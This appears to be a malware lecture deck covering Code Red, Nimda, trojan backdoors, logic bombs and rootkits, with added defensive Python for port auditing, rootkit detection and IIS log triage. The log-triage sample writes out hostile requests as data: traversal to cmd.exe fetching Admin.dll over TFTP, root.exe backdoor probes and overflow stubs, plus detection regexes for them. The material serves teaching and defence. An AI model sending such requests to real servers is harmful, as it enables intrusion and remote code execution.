• Code Red
• Nimda

Windows Worms
• Code Red infected over 250,000 systems in 9 hours on July 19, 2001.
• The Nimda and Code Red worms cost business 3 - 4 billion dollars.

W32/Bady.worm (Code Red) Infection
• Exploits the buffer overflow vulnerability in "idq.dll", the ISAPI extension that provides support for Internet Data Administration (.ida) and Internet Data Query (.idq) script files for Index Server 2.0 and Indexing Service.
• The malicious code is not saved as a file; it is inserted into and run directly from the memory of the IIS process.
• Static worm (identical code on every infection, so it is easy to signature)

W32/Bady.worm (Code Red) Propagation
• If the file C:\Notworm does not exist, new threads are created. If the date is before the 20th of the month, the next 99 threads attempt to exploit more computers by targeting random IP addresses.
• The worm sends its code as an HTTP request. The request exploits the known buffer-overflow vulnerability, which allows the worm to run on your computer.
• Uses an in-memory copy

W32/Bady.worm (Code Red) Payload
• Denial of service (from the 20th to the 27th of the month) by sending large amounts of junk data to port 80 (web service) of 198.137.240.91, which at the time was www.whitehouse.gov. This IP address has since been changed and is no longer active.
• If the default language of the computer is U.S. English, a further thread causes web pages to appear defaced.
First, the thread sleeps two hours and then hooks the function that responds to HTTP requests. Instead of returning the correct web page, the worm returns its own HTML code (defaced web page delivery).

W32/Bady.worm (Code Red) (diagram slide)

Code Red II Infection
• Exploits the security vulnerability in idq.dll, which contains an unchecked buffer in the code that handles input URLs. idq.dll runs in the System context, so exploiting the vulnerability gives the attacker complete control of the server.
• The worm first calls its initialization routine, which identifies the base address of Kernel32.dll in the address space of the IIS server process.
• It then loads WS2_32.dll to access functions such as socket, closesocket and WSAGetLastError. From User32.dll it gets ExitWindowsEx, which the worm uses to reboot the system.
• The main thread checks for two different markers. The first marker, "29A", controls the installation of Trojan.VirtualRoot. The other marker is a semaphore named "CodeRedII". If the semaphore exists, the worm goes into an infinite sleep, so a host is not re-infected.

Code Red II Propagation
• If the default language is Chinese (either Taiwan or PRC), it creates 600 new threads; otherwise it creates 300. These threads generate random IP addresses that are used to search for new web servers to infect.
• The random addresses are not uniformly distributed: the generator favors topologically closer hosts (the same /8 or /16 as the infected machine), so the worm spreads fastest inside the networks it has already reached.

Code Red II Payload
• The Trojan dropped by the worm modifies the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots (adding a few new keys and setting the access value to 217). This allows a hacker to take full control of the web server by sending an HTTP GET request that runs scripts/root.exe on the infected server.
• The Trojan (C:\Explorer.exe) sleeps for a few minutes and then resets these keys, to make sure the registry modifications stick even if an administrator removes them.
• Copies Cmd.exe from the Windows NT \System folder to the following locations (if the parent directories exist):
  – C:\Inetpub\Scripts\Root.exe
  – D:\Inetpub\Scripts\Root.exe
  – C:\Progra~1\Common~1\System\MSADC\Root.exe
  – D:\Progra~1\Common~1\System\MSADC\Root.exe

W32.Nimda.A@mm Infection
• The worm uses the Unicode Web Traversal exploit against IIS (directory traversal through overlong UTF-8 sequences such as %c0%af for "/", which IIS failed to canonicalize before its path check).
• The worm runs as ADMIN.DLL on infected web servers. It then scans and infects files on all available drives, including removable and network drives. The EXE files on these drives (except WINZIP32.EXE) are infected with the worm.
• The infection technique is unusual: the worm embeds the original file inside its own body as a resource. When the infected file is run, the worm extracts the embedded original EXE, runs it and tries to delete it afterwards. If immediate deletion is not possible, the worm creates a WININIT.INI file that deletes the extracted file on the next Windows startup.

W32.Nimda.A@mm Propagation
• The worm searches through all '.htm' and '.html' files in the Temporary Internet Files folder for e-mail addresses. It also reads through the user's inbox and collects the sender addresses. When the address list is ready it uses its own SMTP engine to send the infected messages.
• The worm uses backdoors on IIS servers such as the one Code Red II installs (scripts/root.exe). It scans random IP addresses for these backdoors. When a host is found to have one, the worm instructs the machine (via TFTP) to download the worm code (Admin.dll) from the scanning host, then executes it on the target, infecting it.

W32.Nimda.A@mm Payload
• Large-scale e-mailing: uses MAPI to send itself out as Readme.exe (Readme.exe may NOT be visible as an attachment in the received e-mail)
• Modifies files: replaces multiple legitimate files with itself.
• Degrades performance: may cause system slowdown
• Compromises security settings: opens the C drive as a network share

W32.Nimda.A@mm
• On September 20, 2001, 1,200 computers at the Fairfax County Library were hit by the Nimda worm, forcing all of them off the network. 150 technicians from Virginia's Department of Information Technology were called in to help clean the computers, at 30 minutes to 3 hours each!

The Future of Worms
• Client- and server-side flaws
  – Buffer overflows
  – Format string attacks
  – Design flaws
  – Open shares
  – Misconfigurations

Current Limitations
• Limited capabilities
• Growth and traffic patterns
• Network structure
• Intelligence database

Limited Capabilities: Recon (diagram: one worm node probing RPC, IIS, FTP, LPD and SNMP targets)

Limited Capabilities: Attack (diagram: a worm's attack logic is fixed)
  1 if {1|2|3} attack
  2 else abort
  3 end

Target Network Structure (diagram: early vs. late)
Network Topology (diagram: early vs. late)
Limitations of Directionality (diagram: target network)
Intelligence Database (diagram: nodes N, of which only a few hold information I)

Limitations Conclusions
• Highly visible
• Easily blocked (need a signature)
• Unable to achieve a specific target
• Readily caught

Future Considerations
• Dynamic behavior
• Dynamic updates
• Communications mechanisms
• Infection mechanisms
• Network topologies
• Communications topology
• New targets

Dynamic Behavior (diagram: a node switching among channels such as TCP, TCP/80, SMTP, NNTP, 53/UDP, ICMP and GRE)
Dynamic Behavior (diagram: Communications, Attacks, Platforms; dynamic invocation of capabilities)
Dynamic Network Roles (diagram: nodes labelled I, R, A and Target; not every node contains all components)
Updates to the Nodes (diagram: Release, Retrieve)

Embedding Messages
• Images
• Text
• MP3 files
• Usenet, web, mailing lists
• Freenet, Gnutella, Napster

New Targets
• Embedded devices
  – bugs
  – prevalence on broadband
• Large-audience targets
  – Akamai clients
  – Political, financial motivations

The Future of Worms: Encryption/Obfuscation/Polymorphism
• Covert channel / stealth worms
  – Hiding in plain sight
  – ICMP
  – Encoding in a normal data stream
  – Nonstandard protocols

The Future of Worms: Encryption/Obfuscation/Polymorphism
• Keyed payloads
  – Keying (encrypting) the worm before sending it, so the worm has to "call back" for the key to decode itself
  – The clear-text worm is never transmitted
  – Defenders are more likely to miss the key transmission, so less likely to get a copy of the worm to disassemble

The Future of Worms: Encryption/Obfuscation/Polymorphism
• Standard polymorphic/mutation techniques
  – Worms meet viruses
  – Continuously changing itself
  – Brute-forcing new offsets
  – Adapting to the environment to become "more fit"

The Future of Worms: "Andy Warhol" worms
• Flash worms
  – Faster, more accurate spread (targets are enumerated in advance rather than found by random scanning)
  – Complete spread to all possible targets in 5-20 minutes
  – Very low false-positive rate
  – Too fast to analyze or to disseminate information about

The Future of Worms: Intelligent Worms
• Worms meet AI
  – Worm-infected hosts communicating peer to peer
  – Exchanging information on targeting, propagation, or new infection methods
  – Agent-like behavior

The Future of Worms: Intelligent Worms
• Intelligence database
• Knowledge of other nodes
• Concrete vs. abstract
• Complete vs. incomplete

The Future of Worms: Bigger Scope
• Multi-platform / multi-OS worms
  – Multi-OS shellcode
  – Attacking multiple different vulnerabilities on multiple platforms
  – Single worm code, large attackable base

Trojans
From Quick Thinking Greeks … to Quick Thinking Geeks

Yeah, but what's a Trojan?
• A small program that is designed to appear desirable but is in fact malicious
• Must be run by the user
• Does not replicate itself
• Used to take over a computer, or to steal/delete data
• Good Trojans will not:
  – alert the user
  – alter the way the computer works

Trojan Horses
• A program which appears to be legitimate, but performs unintended actions.
• Trojan horses can install backdoors, perform malicious scanning, monitor system logins and carry out other malicious activities.

Trojans
• An easy weapon for script-kiddies to wreak havoc on the Internet.
• A program that hides behind a potentially valuable or entertaining program. Trojan horses can be viruses or remote-control programs that provide complete access to a victim's computer.
• I was first introduced to one that grabbed passwords on a VAX computer. Someone had written code that mimicked the logon screen and sequence… upon accepting your UserID and password, the owner's account would issue an "improper occurrence" warning and reboot the workstation… then I was able to log on regularly… but my User ID and password were now in a data file owned by the perpetrator.
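Both the Unix worms covered earlier and the Windows backdoors on the following slides announce themselves by the port their server component listens on (Ramen and Lion on 27374/tcp, Lion's root shells on 60008 and 33567/tcp and its trojaned SSH on 33568/tcp, the li0n shell on 10008/tcp that Cheese removes, Slapper's peer-to-peer traffic on 4156/udp in the capture above, BO2K on 54320/tcp and 54321/udp, NetBus on 12345, 12346 and 20034/tcp). The audit below is an added example, not code from the deck or from any of these tools: it parses netstat-style listener output (a constructed sample is embedded) and flags any listener on one of those defaults, plus any high-port listener the administrator did not expect. Two entries are assumptions rather than slide content: the original Back Orifice default of 31337/udp and SubSeven's default of 27374/tcp.

```python
"""Audit `netstat -ln`-style output for the default ports of the worms and
backdoors discussed in this deck.  Added example, not code from the deck."""
import re

# (protocol, port) -> what normally sits there, per the slides.  The last two
# entries (original Back Orifice, SubSeven) are assumptions, not slide content.
KNOWN_BACKDOOR_PORTS = {
    ("tcp", 27374): "Ramen/Lion worm HTTP drop server (also SubSeven default)",
    ("tcp", 60008): "Lion worm backdoor root shell",
    ("tcp", 33567): "Lion worm backdoor root shell",
    ("tcp", 33568): "Lion worm trojaned SSH",
    ("tcp", 10008): "li0n root shell (the one the Cheese worm removes)",
    ("udp", 4156):  "Slapper /tmp/httpd peer-to-peer channel (as captured)",
    ("tcp", 54320): "Back Orifice 2000 default TCP port",
    ("udp", 54321): "Back Orifice 2000 default UDP port",
    ("tcp", 12345): "NetBus 1.x",
    ("tcp", 12346): "NetBus 1.x",
    ("tcp", 20034): "NetBus 2.x",
    ("udp", 31337): "original Back Orifice default (assumption)",
}

# One netstat line: proto, recv-q, send-q, local addr:port, foreign, [state]
LINE_RE = re.compile(
    r"^(?P<proto>tcp|udp)6?\s+\d+\s+\d+\s+"
    r"(?P<addr>\S+?):(?P<port>\d+)\s+\S+(?:\s+(?P<state>\S+))?"
)


def parse_listeners(netstat_text):
    """Return (proto, local_addr, port) for every listening socket."""
    listeners = []
    for line in netstat_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m is None:
            continue                      # header or unrelated line
        proto, state = m.group("proto"), m.group("state")
        if proto == "tcp" and state != "LISTEN":
            continue                      # ESTABLISHED etc. are not listeners
        listeners.append((proto, m.group("addr"), int(m.group("port"))))
    return listeners


def audit(netstat_text, expected_ports=frozenset()):
    """Flag known backdoor defaults and unexpected high-port listeners.

    expected_ports is the administrator's allowlist of (proto, port) pairs
    above 1023 that are supposed to be open on this host."""
    findings = []
    for proto, _addr, port in parse_listeners(netstat_text):
        key = (proto, port)
        if key in KNOWN_BACKDOOR_PORTS:
            findings.append((proto, port, "known backdoor default: " + KNOWN_BACKDOOR_PORTS[key]))
        elif port >= 1024 and key not in expected_ports:
            findings.append((proto, port, "unexpected high-port listener, review"))
    return findings


# Constructed sample output (Linux netstat format, RFC 5737 addresses).
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:27374           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:33568           0.0.0.0:*               LISTEN
tcp        0      0 192.0.2.10:80           198.51.100.7:52160      ESTABLISHED
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN
udp        0      0 0.0.0.0:54321           0.0.0.0:*
udp        0      0 0.0.0.0:123             0.0.0.0:*
"""

if __name__ == "__main__":
    for proto, port, why in audit(SAMPLE_NETSTAT, expected_ports={("tcp", 8080)}):
        print("%s/%d: %s" % (proto, port, why))
```

Ports are only a triage cue: every one of these tools lets the operator pick another port, and a trojaned netstat (the t0rn kit covered later hides exactly this) will not show the listener at all. Treat a hit as a reason to pull the binary behind the socket, and run the audit from a clean netstat copied in on read-only media.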
Trojans
• The majority of modern trojan horses are backdoor utilities
  – SubSeven
  – NetBus
  – Back Orifice
• The feature set usually includes remote control, desktop viewing, an HTTP/FTP server, file sharing, password collection and port redirection
• Some of these trojan horses can be used as legitimate remote administration tools
• Other trojans are mostly programs that steal/delete data or drop viruses

Windows Backdoors
• Back Orifice
• Back Orifice 2000 (BO2K)
• NetBus
• WinVNC (Virtual Network Computing)
• SubSeven

Back Doors
• A backdoor allows a malicious attacker to maintain privileged access to a compromised host
• Unix backdoors are typically installed by a worm or a rootkit, or manually after a system has been initially compromised
• Windows backdoors are typically installed by a virus, worm or Trojan horse.
  – Viruses and worms arrive via e-mail, shared infected files and open Windows shares
  – Trojan horses are typically bundled with a "legitimate" application such as a game

Back Orifice/BO2K
• A "remote administration" tool for Windows 9x and NT.
• Runs on the remote system without the user knowing
• The client can control several servers simultaneously
• Allows the client complete control over the server system, including logging all keystrokes at the console (passwords, e-mail, etc.)
• By default the BO2K server listens on TCP 54320 or UDP 54321 (the original Back Orifice used UDP 31337)

Back Orifice/BO2K
• It sets itself to run automatically by adding a value under the Windows registry key
  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
  whose data is the path of the dropped server executable (c:\Windows\System\UMGR32.EXE in the default BO2K build).
• Because of this, the Trojan runs at every Windows startup.
• It is a remote-control utility with extensive capabilities that operates on Windows 9x and Windows NT systems using a client/server model.
The server is installed on the victim (remote) system, and the client runs on the attacker's local system.

Back Orifice/BO2K
• Besides opening and closing the CD drawer, it can:
  – turn on the microphone and record conversations
  – turn on a camera to record what happens in the room
  – create or modify registry keys
  – log keystrokes
  – create dialog boxes and type messages
  – reboot the machine
  – get detailed system information
  – gather passwords (screensaver, dial-up, network access)
  – dump the hashed NT passwords from the SAM database (for later cracking in L0phtCrack)
  – copy, rename, delete, view and search files and directories, even change share attributes
• If BO2K can't do it, then one of the many (always increasing) add-on plug-ins will.

Back Orifice/BO2K (screenshot slide)
Back Orifice (screenshot slide)

NetBus
• Provides "remote administration" of Windows 9x and NT systems
• Allows full control over windows and devices
  – (open and close windows remotely, screen capture, open and close the CD-ROM tray)
• Logs keystrokes
• Listens on TCP 12345 and 12346 (configurable in v1.7 and up) for connections
• Listens on TCP 20034 (v2.x) for connections

NetBus (screenshot slide)

SubSeven
• Windows "remote administration" utility.
• Allows full control over windows and devices.
• Many features not found in other remote-administration
tools:
  – get the Windows CD-Key
  – retrieve dial-up usernames/passwords and phone numbers
  – AOL/Microsoft/Yahoo IM spy
  – ICQ hijacking

SubSeven (screenshot slide)

SubSeven: Client
• Easy-to-use interface
• Extremely configurable
• www.sub7files.com

SubSeven: Server
• Easy-to-use interface
• Extremely configurable

Amitis (screenshot slide: client and server)

Beast (screenshot slide: client and server)

Beast
• The Registry Manager, from which you can view and edit the victim's registry… an essential tool for the "remote administrator"

Beast
• PDF user's guide
• Full documentation
• Bug reporting….

Z-dem0n (screenshot slide)

Trojans - Jokes
One time this guy walks into a bar…
• Newest category of trojans
• Designed to look extremely malicious, and visible to the user
• Don't really do anything at all

…Others: Logic Bombs
• Designed to be extremely malicious
• Hard to detect
• Run after a certain amount of inactivity or in the absence of a certain activity (the classic trigger is the author's own account no longer logging in)
• Engineered for maximum effect
• Ex. Some logic bombs are claimed to exploit an error in machine code and set a processor on fire; such hardware-damage claims are mostly anecdotal, the documented damage is to data.

Logic Bombs
• Tim Lloyd, Omega Engineering Corporation
• On July 31, 1996 a logic bomb executed, destroying the company's key manufacturing programs and causing a loss of more than $10 million.
• Six lines of code:
  – a renamed copy of DELTREE.EXE, modified to display "fixing" instead of "deleting" while it wiped the file server
  – followed by PURGE F:\ /ALL, so the deleted files could not be recovered

Easter Eggs: Windows, Photoshop 6
1. Open Photoshop 6
2. Hold down CTRL-ALT
3. Go to Help > About Photoshop...
4. See the cat ("Venus in Furs")

Easter Eggs: Windows, Photoshop 6
1. Hold the Ctrl and Alt keys and open the About Photoshop option
2. The usual Electric Cat screen appears.
3. Wait several seconds for the credits to begin scrolling
4.
Pressing the Alt key will speed them up...
5. Now, while they're speeding, click the big eye once...
6. While still holding the Alt key, press the Ctrl key
7. Let up on the Alt key.
8. About 60 secret messages will pop up above the scrolling credits

Easter Eggs: Photoshop 6 (Mac, Option key)
1. Hold down the Option key
2. Choose "Palette Options..." from the Layers palette
3. The Merlin window appears

Bizarre Code….
Why did the computer shut down unexpectedly? The computer got very poorly and decided to end its own suffering.
Makes you wonder what else is hidden?

Unix Backdoors
• Backdoors on Unix are typically a shell bound to a network port.
  – A remote attacker connects to the port and executes commands with the privileges of the bound shell (root, when a worm or rootkit installed it)
• A trojaned daemon such as SSH (included in a rootkit) may provide root access without a password.

Root Kits
• A rootkit is a collection of tools that lets the hacker keep a backdoor into the system, collect information about other hosts on the network, and mask the fact that the system is compromised
• Hides the intruder's activity on the system
• Allows the intruder to keep privileged access, NOT to obtain it initially
• Rootkits are Trojan horses (trojaned copies of system binaries such as ls, ps, netstat and login) and typically provide a backdoor
• Most rootkits can be detected by running an integrity checker such as Tripwire: compare the current hashes of system binaries against a baseline taken from a known-good install and stored off the host

Root Kits
• The original rootkit was distributed from bulletin boards…
  – the public remained unaware for a few years. Finally made public in the early '90s.
• Now WIDELY available for many platforms.
• Include an Ethernet sniffer to help find accesses to other servers.
• Once root privilege is obtained on a Unix-based OS, look to trusted hosts.
• Modify key programs and overwrite them in the OS
• Newer "kernel-based" rootkits are hard to detect (e.g., "Knark"), because the trojaned code is in the kernel and every user-land tool, including the integrity checker, sees what the kernel chooses to show.
T0rn Kit
$ ./t0rn
(ASCII-art "t0rnkit" banner printed by the installer)

Knark
• Kernel-based rootkit for Linux, implemented as a loadable kernel module
• Hides files
• Hides running processes
• Hides active network connections
• Changes the user and group IDs of running processes

Knark (by Creed, from the README)
• Knark is a kernel-based rootkit for Linux 2.2. No part of knark may be used to break the law, or to cause damage of any kind. And I'm not responsible for anything you do with it. The heart of the package, knark.c, is a Linux lkm (loadable kernel-module). Type "make" to compile knark and the programs included, and then "insmod knark" to load the lkm. When knark is loaded, the hidden directory /proc/knark is created. The following files are created in this directory:
  author      shameless self-promotion banner :-)
  files       list of hidden files on the system
  nethides    list of strings hidden in /proc/net/[tcp|udp]
  pids        list of hidden pids, ps-like output
  redirects   list of exec-redirection entries

NT Rootkit
• Windows NT or Windows 2000!
• Dynamically loadable kernel device driver.
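The two rootkit detection ideas on the slides above, the Tripwire-style integrity check against user-land kits such as t0rn (which overwrite ls, ps, netstat and login) and the problem of kernel kits such as Knark that hide processes from /proc, can both be demonstrated in a few dozen lines. The code below is an added example, not code from the deck, from Tripwire or from any rootkit. The first half builds a baseline of (mode, size, SHA-256) per file and diffs it against a later snapshot; demo_baseline() runs that on a constructed temporary directory standing in for /bin. The second half is a cross-view check: a pid that kill(pid, 0) says exists but that is missing from the /proc listing is hidden from user land. The pid_max of 32768 is an assumption (the classic Linux default); read /proc/sys/kernel/pid_max on a real host.

```python
"""Rootkit checks: file-integrity baseline (t0rn-style user-land kits) and a
/proc cross-view for hidden processes (Knark-style kernel kits).
Added example, not code from the deck, Tripwire or any rootkit."""
import errno
import hashlib
import os
import shutil
import stat
import tempfile


def hash_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map relative path -> (mode, size, sha256) for every regular file under root.
    The baseline must come from a known-good install and be kept off-host or on
    read-only media; an intruder with root can otherwise simply re-baseline."""
    baseline = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)                  # lstat: never follow symlinks
            if not stat.S_ISREG(st.st_mode):
                continue
            rel = os.path.relpath(full, root)
            baseline[rel] = (stat.S_IMODE(st.st_mode), st.st_size, hash_file(full))
    return baseline


def compare_baseline(old, new):
    """Trojaned files show up as modified, dropped tools as added."""
    return {
        "modified": sorted(p for p in old if p in new and old[p] != new[p]),
        "added": sorted(p for p in new if p not in old),
        "removed": sorted(p for p in old if p not in new),
    }


def demo_baseline():
    """Constructed scenario: baseline a fake /bin, then 'install a rootkit'."""
    root = tempfile.mkdtemp()
    try:
        for name in ("ls", "ps", "who"):
            with open(os.path.join(root, name), "wb") as f:
                f.write(b"ELF original " + name.encode())
        before = build_baseline(root)
        with open(os.path.join(root, "ps"), "wb") as f:      # trojaned ps
            f.write(b"ELF trojaned ps that hides the sniffer")
        os.remove(os.path.join(root, "who"))                  # removed by the kit
        with open(os.path.join(root, ".rk"), "wb") as f:      # dropped sniffer
            f.write(b"sniffer")
        return compare_baseline(before, build_baseline(root))
    finally:
        shutil.rmtree(root)


def pid_exists(pid):
    """kill(pid, 0) delivers no signal; EPERM still proves the pid exists."""
    try:
        os.kill(pid, 0)
    except OSError as e:
        return e.errno == errno.EPERM
    return True


def hidden_pids(visible_pids, probe, pid_max=32768):
    """Cross-view: pids that `probe` says exist but the /proc listing lacks.
    Knark hooks the directory listing of /proc, not the existence check that
    kill(pid, 0) performs.  pid_max=32768 is an assumed classic default."""
    return sorted(pid for pid in range(1, pid_max)
                  if pid not in visible_pids and probe(pid))


def live_hidden_pids():
    """Gather the user-land view, thread ids included (threads are not listed
    in /proc either, and would otherwise be false positives)."""
    visible = set()
    for n in os.listdir("/proc"):
        if n.isdigit():
            visible.add(int(n))
            try:
                visible.update(int(t) for t in os.listdir("/proc/%s/task" % n))
            except OSError:
                pass
    return hidden_pids(visible, pid_exists)


def knark_marker_present():
    """/proc/knark is hidden from listings but still opens by name."""
    return os.path.isdir("/proc/knark")


if __name__ == "__main__":
    print(demo_baseline())
    if os.path.isdir("/proc"):
        print("hidden pids:", live_hidden_pids(), "knark dir:", knark_marker_present())
```

A process that starts or exits between the /proc listing and the probe loop shows up as a one-off false positive, so re-run before acting on a hit. The cross-view only works while the kernel kit leaves kill() alone; once the kernel itself lies consistently, the remaining options are the ones the slides point at, a trusted boot of the disk on a clean system and comparing what the wire shows against what the host admits to.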
• Features at a glance:
  – Process hiding
  – File hiding
  – EXE redirection

NT Rootkit (screenshot: process hiding)

NT Rootkit (screenshot: file hiding)

NT Rootkit
• Features continued…
  – Hiding registry values
  – Keyboard sniffer
  – Rootkit console shell

NT Rootkit (screenshot: rootkit console with keyboard sniffing)

The Cost of Malware
• Money – costs of hiring temporary staff to repair damage and recover data
• Time – staff time needed to repair damage, recover data and supervise the temps
• Reputation – unexpected downtime (website and/or library) causes patrons to go elsewhere
• Trust – patrons trust you with their personal information; vendors trust you to authenticate your users

Money
• Omega Engineering: $10 million - logic bomb
• 2000 - ILOVEYOU and its copycats caused $6.7 billion in damage in the first five days.

Time
• The Fairfax County Library Nimda incident of September 20, 2001 (see above): 1,200 computers forced off the network, and 150 technicians cleaning them at 30 minutes to 3 hours each.

Reputation
For Release: January 18, 2002
Eli Lilly Settles FTC Charges Concerning Security Breach
Company Disclosed E-mail Addresses of 669 Subscribers to its Prozac Reminder Service
Eli Lilly and Company (Lilly) has agreed to settle Federal Trade Commission charges regarding the unauthorized disclosure of sensitive personal information collected from consumers through its Prozac.com Web site.
As part of the settlement, Lilly will take appropriate security measures to protect consumers' privacy…

Trust (slide with no recoverable text)

Trends
• More sophisticated intruders
• More sophisticated attack tools
• "Time to patch" is shrinking: the window between a vulnerability's disclosure and its exploitation keeps getting shorter
• Increasing permeability of firewalls
• Increased ability to mount distributed attacks
• Increased threat from infrastructure attacks
  – DoS, worms, attacks on the DNS system and router-based attacks
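The Windows worms covered earlier all leave distinctive lines in an IIS log, and a defender in 2001 could tell the three apart from the web server's own records: Code Red and Code Red II both hit /default.ida with a long run of padding before the %u-encoded shellcode (N for Code Red, X for Code Red II), Code Red II's Trojan leaves /scripts/root.exe and /MSADC/root.exe, and Nimda both probes for that root.exe and drives cmd.exe through the Unicode and double-decode traversal forms, pulling Admin.dll over TFTP. The triage script below is an added example, not code from the deck or from any vendor writeup; the IIS W3C log lines it runs on are constructed, with the shellcode abbreviated to a few %u tokens.

```python
"""Triage IIS W3C-format log lines for Code Red, Code Red II and Nimda traces.
Added example, not code from the deck; the sample log is constructed."""
import re
from collections import Counter

# #Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
LOG_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
    r"(?P<stem>\S+) (?P<query>\S+) (?P<status>\d+)$"
)
ROOT_EXE_RE = re.compile(r"/(scripts|msadc)/root\.exe$")
# '..' followed by an encoded separator: the Unicode (%c0%af, %c1%9c) and
# double-decode (%255c, %%35c) spellings of '/' and '\' that IIS let through.
TRAVERSAL_RE = re.compile(r"\.\.(%c0%af|%c1%9c|%c1%1c|%255c|%%35c|%25%35%63)")


def classify(stem, query):
    """Return a label for a worm artifact, or None for an ordinary request."""
    s, q = stem.lower(), query.lower()
    if s.endswith(".ida"):
        # GET /default.ida?NNNN...%u9090...: Code Red pads with 'N',
        # Code Red II with 'X', ahead of the %u-encoded overflow payload.
        m = re.match(r"^(n{20,}|x{20,})", q)
        if m is None:
            return "unclassified .ida overflow attempt"
        return "Code Red" if m.group(1)[0] == "n" else "Code Red II"
    if ROOT_EXE_RE.search(s):
        return "root.exe backdoor probe (Code Red II drop; Nimda scans for it)"
    if s.endswith("/cmd.exe") and TRAVERSAL_RE.search(s):
        if "tftp" in q and "admin.dll" in q:
            return "Nimda: traversal to cmd.exe, fetching Admin.dll by TFTP"
        return "Unicode/double-decode traversal to cmd.exe"
    return None


def triage(log_text):
    """Return (client ip, label) for every worm-related request in the log."""
    hits = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue                          # W3C header lines
        m = LOG_RE.match(line)
        if m is None:
            continue
        label = classify(m.group("stem"), m.group("query"))
        if label:
            hits.append((m.group("ip"), label))
    return hits


def sources(hits):
    """Hits per client: worm sources repeat, a curious human rarely does."""
    return Counter(ip for ip, _ in hits)


# Constructed sample log (RFC 5737 documentation addresses, abbreviated payloads).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-07-19 14:31:02 198.51.100.7 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090=a 200
2001-08-04 09:12:44 203.0.113.5 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090=a 200
2001-09-18 10:22:01 203.0.113.9 GET /scripts/root.exe /c+dir 200
2001-09-18 10:22:02 203.0.113.9 GET /MSADC/root.exe /c+dir 404
2001-09-18 10:22:03 203.0.113.9 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+tftp%20-i%20203.0.113.9%20GET%20Admin.dll 200
2001-09-18 10:22:04 203.0.113.9 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 10:25:00 192.0.2.44 GET /index.htm - 200
"""

if __name__ == "__main__":
    for ip, label in triage(SAMPLE_LOG):
        print(ip, label)
    print(sources(triage(SAMPLE_LOG)))
```

The status code matters when reading the output: a 200 on the root.exe or cmd.exe lines means the host already had the Code Red II backdoor or an unpatched traversal and should be treated as compromised, while a 404 is a probe that missed. Note that the .ida request is logged even when the overflow succeeds, since IIS writes the log entry before the ISAPI extension runs, which is why Code Red was visible in logs long before anyone had a signature for it.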